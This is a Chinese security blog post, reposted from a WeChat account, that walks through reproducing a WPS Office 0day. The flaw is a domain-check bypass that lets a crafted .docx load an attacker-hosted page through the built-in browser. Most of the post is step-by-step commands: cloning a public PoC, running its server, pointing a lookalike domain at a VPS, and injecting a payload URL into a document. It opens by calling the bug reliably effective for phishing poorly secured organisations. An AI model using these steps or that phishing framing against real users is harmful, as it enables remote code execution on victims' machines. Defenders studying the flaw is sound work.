这个day是今年国护的时候爆出来的,虽然国护已经过去很久但是这个day的杀伤力依旧很大,许多单位安全意识很薄,借助这个0day钓鱼可谓是屡试不爽。
漏洞影响
WPS Office 2023个人版<11.1.0.15120;WPS Office 2019企业版<11.8.2.1208
漏洞原理
WPS 有内置浏览器,当打开该文档时, WPS 就会通过内置浏览器加载该链接。而有漏洞的版本对域名clientweb.docer.wps.cn.{xxxxx}wps.cn不进行检测,因而可以借助这个逻辑漏洞完成绕过。
复现准备:
本地复现
下载poc,需要python3.8以上的版本
https://github.com/ba0gu0/wps-rce
执行以下命令安装依赖文件
cd wps_rce
pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
在server文件夹下运行
python3 main.py
访问url
在受害主机上添加host
vpsip clientweb.docer.wps.cn.hackerwps.cn
因此弹出计算器的payload为
http://clientweb.docer.wps.cn.hackerwps.cn/calc
进入client文件夹运行
python main.py test.docx http://clientweb.docer.wps.cn.hackerwps.cn/calc
test是要注入payload的文档
生成带有命令的payload到目标主机上运行
原文始发于微信公众号(安全攻防屋):(已复现)WPS钓鱼0day分享
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论